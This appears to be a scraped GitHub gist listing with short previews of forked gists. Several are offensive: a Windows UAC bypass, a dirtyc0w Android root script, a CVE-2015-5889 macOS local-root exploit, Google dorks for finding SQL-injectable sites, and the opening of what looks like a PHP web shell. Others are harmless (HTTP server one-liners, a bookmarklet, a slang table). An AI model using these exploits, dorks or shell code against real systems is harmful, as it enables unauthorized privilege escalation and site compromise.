Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
yashodhank
/ UACBypass.ps1
Created
January 23, 2017 07:27
— forked from mattifestation/UACBypass.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-UACBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
| Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
yashodhank
/ root.sh
Created
January 23, 2017 07:28
— forked from Arinerron/root.sh
"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Give the usual warning. | |
| clear; | |
| echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds..."; | |
| sleep 10; | |
| clear; | |
| # Download and extract exploit files. | |
| echo "[INFO] Downloading exploit files from GitHub..."; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2015-5889: issetugid() + rsh + libmalloc osx local root | |
| import os,time,sys | |
| env = {} | |
| s = os.stat("/etc/sudoers").st_size | |
| env['MallocLogFile'] = '/etc/crontab' | |
| env['MallocStackLogging'] = 'yes' |
yashodhank
/ permissions.txt
Created
January 23, 2017 07:50
— forked from Arinerron/permissions.txt
A list of all Android permissions...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| android.permission.ACCESS_ALL_DOWNLOADS | |
| android.permission.ACCESS_BLUETOOTH_SHARE | |
| android.permission.ACCESS_CACHE_FILESYSTEM | |
| android.permission.ACCESS_CHECKIN_PROPERTIES | |
| android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY | |
| android.permission.ACCESS_DOWNLOAD_MANAGER | |
| android.permission.ACCESS_DOWNLOAD_MANAGER_ADVANCED | |
| android.permission.ACCESS_DRM_CERTIFICATES | |
| android.permission.ACCESS_EPHEMERAL_APPS | |
| android.permission.ACCESS_FM_RADIO |
yashodhank
/ web-servers.md
Created
January 23, 2017 07:57
— forked from willurd/web-servers.md
Big list of http static server one-liners
yashodhank
/ bookmarklet_select_all.js
Created
January 23, 2017 07:58
— forked from willurd/bookmarklet_select_all.js
Select All: A bookmarklet for those annoying sites that block you from selecting stuff
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript:(function()%7Bvar style%3Ddocument.createElement("style")%3Bstyle.type%3D"text/css"%3Bstyle.innerText%3D"* %7B -webkit-user-select: all !important%3B -moz-user-select: all !important%3B user-select: all !important%3B %7D"%3Bvar head%3Ddocument.getElementsByTagName("head")%5B0%5D%3Bhead.appendChild(style)%3B%7D)()%3B |
yashodhank
/ Google Dorks for SQL Injection
Created
January 23, 2017 08:02
— forked from richin13/Google Dorks for SQL Injection
Taken from http://www.hackwifi.net/2016/04/fresh-google-dorks-sql-injection.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| accinfo.php?cartId= | |
| acclogin.php?cartID= | |
| add.php?bookid= | |
| add_cart.php?num= | |
| addcart.php? | |
| addItem.php | |
| add-to-cart.php?ID= | |
| addToCart.php?idProduct= | |
| addtomylist.php?ProdId= | |
| adminEditProductFields.php?intProdID= |
yashodhank
/ Internet Slang and Emoticons.md
Created
January 23, 2017 08:55
— forked from Zenexer/Internet Slang and Emoticons.md
Internet slang, abbreviations, and emoticons
| Slang | Variations | Recency* | Modern use | Meaning |
|---|---|---|---|---|
| /s | New | Yes | Sarcasm (suffix) | |
| 3cool5u | 3cool5me | New | Yes | "Too cool for you"; from "2cool4u" |
| 420 | Very old | Yes | "Marijuana" | |
| afaik | Old | Yes | "As far as I know" | |
| afk | Very old | Yes | "Away from keyboard" | |
| asl | a/s/l | Very old | Yes | "Age/sex/location?"; sexual context |
yashodhank
/ escapeshellrce.md
Created
January 23, 2017 08:57
— forked from Zenexer/escapeshellrce.md
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
Paul Buonopane [email protected] at NamePros
PGP: https://keybase.io/zenexer
I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.
This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.
This advisory does not yet have associated CVE identifiers.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //Starting calls | |
| if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} | |
| error_reporting(5); | |
| @ignore_user_abort(TRUE); | |
| @set_magic_quotes_runtime(0); | |
| $win = strtolower(substr(PHP_OS,0,3)) == "win"; | |
| define("starttime",getmicrotime()); | |
| if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} | |
| $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); |